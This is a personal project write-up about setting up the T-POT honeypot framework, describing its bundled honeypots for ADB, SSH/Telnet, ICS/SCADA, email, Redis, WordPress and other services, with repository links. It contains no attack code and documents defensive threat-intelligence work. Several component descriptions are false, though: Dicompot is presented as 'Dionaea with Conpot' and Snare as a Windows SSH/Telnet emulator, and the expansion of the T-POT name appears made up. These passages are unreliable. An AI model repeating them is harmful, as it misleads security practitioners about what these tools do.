Project: Honeypot (T-POT

I’ve set up a honeypot using T-POT. This honeypot simulates vulnerable services & traps malicious actors, providing invaluable data for threat analysis & mitigation strategies.

This project helps me to visualize & track daily attacks & attackers that are active across the internet. I can research specific IP address, known attackers, known attacks, compare to CVE’s, & check my own network device vulnerabilities against attacks that are in use.

What is T-POT?

T-POT, which stands for “Threat Intelligence Pot”, is an open-source honeypot framework designed to automate the deployment & management of honeypots for network security monitoring & threat intelligence gathering. It aims to simplify the process of setting up various types of honeypots & collecting data on potential threats.

https://github.security.telekom.com/2024/04/honeypot-tpot-24.04-released.html#technical-architecture

ADB Honey

ADB Honey is a honeypot designed to emulate Android Debug Bridge (ADB) servers, which are used for debugging & managing Android devices remotely. ADB Honey is specifically crafted to attract & monitor attacks targeting ADB servers.

Android Debug Bridge (ADB) is a versatile command-line tool that allows developers to communicate with an Android device from a computer over a USB connection or a network connection. It provides various functionalities, such as installing & debugging apps, accessing the device’s shell, transferring files, & more.

ADB Honey operates by simulating an ADB server, thereby appearing as a legitimate target to potential attackers scanning the network for vulnerable ADB instances. Once attackers interact with the honeypot, ADB Honey captures information about the attempted exploits, commands executed, & any malware payload delivered, enabling security researchers to analyze the attack techniques & gather threat intelligence.

https://github.com/huuck/ADBHoney

CiscoASA

The CiscoASA honeypot is a specialized honeypot designed to emulate Cisco ASA (Adaptive Security Appliance) devices, which are widely used for network security & VPN (Virtual Private Network) solutions. Cisco ASA devices are commonly deployed in enterprise environments to provide firewall, intrusion prevention, VPN, & other network security functionalities.

The CiscoASA honeypot within the T-POT framework simulates the behavior of a Cisco ASA device, including its configuration, services, & responses to network traffic. By emulating a Cisco ASA device, the honeypot aims to attract & intercept attacks targeting these types of security appliances.

Attackers often target Cisco ASA devices to exploit vulnerabilities, gain unauthorized access, or conduct reconnaissance activities within corporate networks. By deploying a CiscoASA honeypot, security professionals can monitor & analyze the tactics, techniques, & procedures (TTPs) used by attackers against Cisco ASA devices without exposing real infrastructure to risk.

https://github.com/Cymmetria/ciscoasa_honeypot

Citrix Honeypot

The Citrix honeypot is a specialized honeypot within the T-POT framework designed to emulate Citrix NetScaler devices. Citrix NetScaler is a widely used application delivery controller (ADC) & load balancer solution that provides various networking & security functionalities, including traffic management, SSL offloading, application firewall, & remote access.

The Citrix honeypot simulates the behavior of a Citrix NetScaler device, including its configuration, services, & responses to network traffic. By emulating a Citrix NetScaler device, the honeypot aims to attract & intercept attacks targeting these types of network infrastructure devices.

Attackers may target Citrix NetScaler devices to exploit vulnerabilities, gain unauthorized access, or conduct reconnaissance activities within corporate networks. By deploying a Citrix honeypot, security professionals can monitor & analyze the tactics, techniques, & procedures (TTPs) used by attackers against Citrix NetScaler devices without exposing real infrastructure to risk.

https://github.com/haxrob/citrix-honeypot

Conpot

Conpot is an open-source ICS/SCADA (Industrial Control Systems/Supervisory Control & Data Acquisition) honeypot framework designed to emulate industrial control system protocols & services. It is specifically tailored to attract & monitor attacks targeting critical infrastructure components, such as programmable logic controllers (PLCs), human-machine interfaces (HMIs), & other SCADA devices.

Conpot allows security professionals to deploy virtualized instances of industrial control system components, simulating their behavior & responses to network traffic. By emulating these components, Conpot aims to deceive attackers into interacting with the honeypot, thereby capturing information about their tactics, techniques, & procedures (TTPs).

Some key features of Conpot include:

  • Emulation of Industrial Protocols: Conpot supports emulation of various industrial protocols, including Modbus, S7Comm, DNP3, Ethernet/IP, & others commonly used in SCADA & ICS environments.
  • Realistic Responses: The framework provides realistic responses to network requests, mimicking the behavior of legitimate industrial control devices.
  • Data Collection: Conpot captures & logs network traffic, commands, & interactions with the honeypot, allowing security analysts to analyze attacker behavior & gather threat intelligence.
  • Integration with T-POT: Conpot can be integrated into the T-POT framework, allowing users to deploy & manage multiple honeypots, including SCADA/ICS honeypots, in a unified environment.

https://github.com/mushorg/conpot

Cowrie

Cowrie is a popular medium-interaction SSH (Secure Shell) & Telnet honeypot designed to capture & log attempted attacks against SSH & Telnet services. It emulates a vulnerable SSH/Telnet server, attracting attackers who attempt to exploit common vulnerabilities or gain unauthorized access to systems.

Key features of Cowrie include:

  • Emulation of SSH/Telnet Services: Cowrie simulates the behavior of SSH & Telnet services, presenting itself as a legitimate target for attackers scanning the internet for vulnerable systems.

  • Interaction Logging: The honeypot logs all interaction attempts made by attackers, including login attempts, commands executed, & file transfer requests.

  • File System Emulation: Cowrie emulates a file system structure, allowing attackers to navigate directories & interact with fake files & directories.

  • Session Capture: Cowrie captures full session data, including keystrokes & terminal output, providing valuable insight into attacker behavior & techniques.

  • Integration with T-POT: Cowrie can be integrated into the T-POT framework, allowing users to deploy & manage multiple honeypots within a unified environment.

https://github.com/cowrie/cowrie

Ddospot

DDoSPot is a honeypot “platform” for tracking & monitoring UDP-based Distributed Denial of Service (DDoS) attacks. The platform currently supports following honeypot services/servers in form of relatively simple plugins called pots:

  • DNS server
  • NTP server
  • SSDP server
  • CHARGEN server
  • Random/mock UDP server

https://github.com/aelth/ddospot

Dicompot

Dicompot, also known as “Dionaea with Conpot”, is a combination of two honeypots: Dionaea & Conpot.

  • Dionaea: Dionaea is a high-interaction honeypot designed to capture & analyze malware samples & exploits targeting vulnerable services like SMB (Server Message Block), HTTP, & FTP (File Transfer Protocol). It emulates various services & waits for attackers to interact with them, capturing information about their activities, including the malware they attempt to download or execute.

  • Conpot: Conpot is an ICS/SCADA (Industrial Control Systems/Supervisory Control & Data Acquisition) honeypot that emulates industrial control system protocols to attract & study attacks targeting critical infrastructure. It simulates the behavior of industrial devices, such as PLCs (Programmable Logic Controllers) & HMIs (Human-Machine Interfaces), to gather intelligence on threats to industrial environments.

When combined as Dicompot, these two honeypots work together to provide comprehensive coverage for both IT & OT (Operational Technology) environments. Dicompot allows security professionals to monitor & analyze attacks targeting both traditional IT infrastructure & industrial control systems, providing valuable insights into the tactics, techniques, & procedures used by attackers across different sectors.

https://github.com/nsmfoo/dicompot

Dionaea

Dionaea is a high-interaction honeypot designed to capture & analyze malware samples & exploits targeting vulnerable services. It emulates various network services such as SMB (Server Message Block), HTTP, FTP (File Transfer Protocol), & others to attract & interact with potential attackers.

Key features of Dionaea:

  • Emulation of Vulnerable Services: Dionaea simulates the behavior of real services with known vulnerabilities, making it appear as a legitimate target for attackers scanning the internet for vulnerable systems.

  • Malware Capture: When attackers interact with Dionaea, the honeypot captures any malware samples or exploits they attempt to download or execute. This allows security analysts to analyze the malware & understand its capabilities.

  • Interaction Logging: Dionaea logs all interaction attempts made by attackers, including connection attempts, commands executed, & file transfer requests. This information provides valuable insight into attacker behavior & techniques.

  • Protocol Support: Dionaea supports multiple protocols, including SMB, HTTP, FTP, & more, allowing it to capture a wide range of malicious activity targeting different services.

https://github.com/DinoTools/dionaea

Endlessh

Endlessh is a lightweight, open-source SSH tarpit (or SSH honeypot) designed to slow down & frustrate SSH brute-force attacks. It works by accepting incoming SSH connection attempts but deliberately delaying the connection process, making it time-consuming for attackers to determine whether the connection attempt was successful.

Key features of Endlessh include:

  • Tarpitting: Endlessh slows down SSH connection attempts by delaying the negotiation process. This effectively wastes the time of attackers attempting to brute-force SSH credentials, making their efforts less efficient.

  • Minimal Resource Usage: Endlessh is designed to be lightweight & consumes minimal system resources. It can run on low-powered devices or servers without significantly impacting performance.

  • Logging: Endlessh logs all connection attempts, including the source IP addresses & timestamps. This information can be valuable for analyzing brute-force attempts & identifying potential attackers.

  • Easy to Deploy: Endlessh is easy to deploy & configure, making it accessible for both experienced sysadmins & novice users interested in enhancing their SSH security.

https://github.com/skeeto/endlessh

Heralding

Credentials collector. Currently the following protocols are supported: ftp, telnet, ssh, http, https, pop3, pop3s, imap, imaps, smtp, vnc, postgresql & socks5.

https://github.com/johnnykv/heralding/blob/master/README.rst

IPPHoney

IPPHoney is a low-interaction honeypot designed to emulate Internet Printing Protocol (IPP) printers. IPP is a protocol used for printing documents over the Internet & local networks. IPPHoney is specifically crafted to attract & monitor attacks targeting IPP printers.

Key features of IPPHoney include:

  • Emulation of IPP Printers: IPPHoney emulates the behavior of IPP printers, making it appear as a legitimate printer on the network.

  • Logging: The honeypot logs all interaction attempts made by attackers, including print job requests & configuration queries.

  • Detection of Attacks: IPPHoney captures information about potential attacks targeting IPP printers, such as attempts to exploit vulnerabilities or gain unauthorized access.

  • Threat Intelligence Gathering: By deploying IPPHoney, security professionals can gather intelligence on the tactics, techniques, & procedures (TTPs) used by attackers targeting IPP printers.

https://github.com/bontchev/ipphoney

Log4Pot

A honeypot for the Log4Shell vulnerability

  • Listen on various ports for Log4Shell exploitation.
  • Detect exploitation in request line & headers.
  • Download exploit payloads recursively.
  • Log to file & Azure blob storage.

https://github.com/thomaspatzke/Log4Pot

Mailoney

Mailoney is a high-interaction honeypot designed to emulate email services, such as SMTP (Simple Mail Transfer Protocol) servers, to attract & monitor malicious activities targeting email infrastructure. It is specifically crafted to mimic the behavior of real email servers, making it appear as a legitimate target for attackers attempting to exploit vulnerabilities, send spam, or conduct phishing campaigns.

Key features of Mailoney include:

  • Emulation of Email Services: Mailoney simulates the behavior of SMTP servers, allowing it to accept incoming email connections, receive email messages, & respond to email-related requests.

  • Logging: The honeypot logs all email-related activities, including connection attempts, email delivery attempts, message content, sender information, & recipient information.

  • Detection of Malicious Activity: Mailoney captures information about potential threats targeting email infrastructure, such as attempts to exploit vulnerabilities, deliver malware-laden attachments, or send unsolicited bulk emails (spam).

  • Threat Intelligence Gathering: By deploying Mailoney, security professionals can gather intelligence on the tactics, techniques, & procedures (TTPs) used by attackers targeting email services, helping organizations improve their email security posture & defend against email-based threats.

https://github.com/phin3has/mailoney

Medpot

Is a honeypot that tries to emulate HL7 / FHIR honeypot

https://github.com/schmalle/medpot

Redishoneypot

Redishoneypot is a type of honeypot designed to emulate Redis servers. Redis is an open-source, in-memory data structure store that is commonly used as a database, cache, or message broker. Redishoneypot aims to attract & monitor attacks targeting Redis servers, such as unauthorized access attempts, exploitation of vulnerabilities, or reconnaissance activities.

Key features of Redishoneypot may include:

  • Emulation of Redis Protocol: Redishoneypot simulates the behavior of a real Redis server, responding to commands & requests as if it were a legitimate Redis instance.

  • Logging & Monitoring: The honeypot logs all interaction attempts made by attackers, including commands executed, connection attempts, & responses received. This information can help security professionals analyze attacker behavior & identify potential threats.

  • Detection of Attacks: Redishoneypot captures information about potential attacks targeting Redis servers, such as attempts to exploit known vulnerabilities or abuse Redis functionality for malicious purposes.

  • Threat Intelligence Gathering: By deploying Redishoneypot, organizations can gather intelligence on the tactics, techniques, & procedures (TTPs) used by attackers targeting Redis infrastructure. This information can be used to improve security defenses & mitigate risks associated with Redis deployments.

SentryPeer

SentryPeer® is a fraud detection tool. It lets bad actors try to make phone calls & saves the IP address they came from & number they tried to call. Those details can then be used to raise notifications at the service providers network & the next time a user/customer tries to call a collected number, you can act anyway you see fit.

https://github.com/SentryPeer/SentryPeer

Snare

Snare is a medium-interaction honeypot designed to emulate a Windows environment, specifically targeting SSH & Telnet protocols. It is often used to capture & analyze attacks targeting Windows-based systems.

Key features of Snare include:

  • Emulation of Windows Environment: Snare simulates the behavior of a Windows system, including responding to SSH & Telnet connection attempts as if it were a legitimate Windows server.

  • Medium Interaction: Snare provides a level of interaction that is more realistic than low-interaction honeypots but less resource-intensive than high-interaction honeypots. This allows it to capture a wide range of attack techniques while minimizing the risk of compromise.

  • Logging & Monitoring: Snare logs all interaction attempts made by attackers, including commands executed, login attempts, & file transfer requests. This information is valuable for analyzing attacker behavior & identifying potential threats.

  • Detection of Attacks: Snare captures information about potential attacks targeting Windows systems, such as attempts to exploit vulnerabilities, gain unauthorized access, or execute malicious commands.

  • Threat Intelligence Gathering: By deploying Snare, organizations can gather intelligence on the tactics, techniques, & procedures (TTPs) used by attackers targeting Windows environments. This information can be used to improve security defenses & mitigate risks associated with Windows-based systems.

https://github.com/mushorg/snare

Wordpot

Wordpot is a medium-interaction honeypot designed to emulate vulnerable WordPress installations. It is specifically crafted to attract & monitor attacks targeting WordPress-based websites.

WordPress is one of the most popular content management systems (CMS) used to build websites & blogs. Due to its widespread adoption, WordPress sites can be targets for attackers seeking to exploit vulnerabilities or gain unauthorized access.

Key features of Wordpot include:

  • Emulation of WordPress: Wordpot simulates the behavior of a WordPress website, including presenting itself as a legitimate target for attackers scanning the internet for vulnerable WordPress installations.

  • Medium Interaction: Wordpot provides a level of interaction that is more realistic than low-interaction honeypots but less resource-intensive than high-interaction honeypots. This allows it to capture a wide range of attack techniques while minimizing the risk of compromise.

  • Logging & Monitoring: Wordpot logs all interaction attempts made by attackers, including login attempts, plugin & theme installations, & malicious file uploads. This information is valuable for analyzing attacker behavior & identifying potential threats.

  • Detection of Attacks: Wordpot captures information about potential attacks targeting WordPress websites, such as attempts to exploit known vulnerabilities, brute-force login attempts, or injection attacks.

  • Threat Intelligence Gathering: By deploying Wordpot, organizations can gather intelligence on the tactics, techniques, & procedures (TTPs) used by attackers targeting WordPress sites. This information can be used to improve security defenses & mitigate risks associated with WordPress-based websites.

https://github.com/gbrindisi/wordpot

Honeypot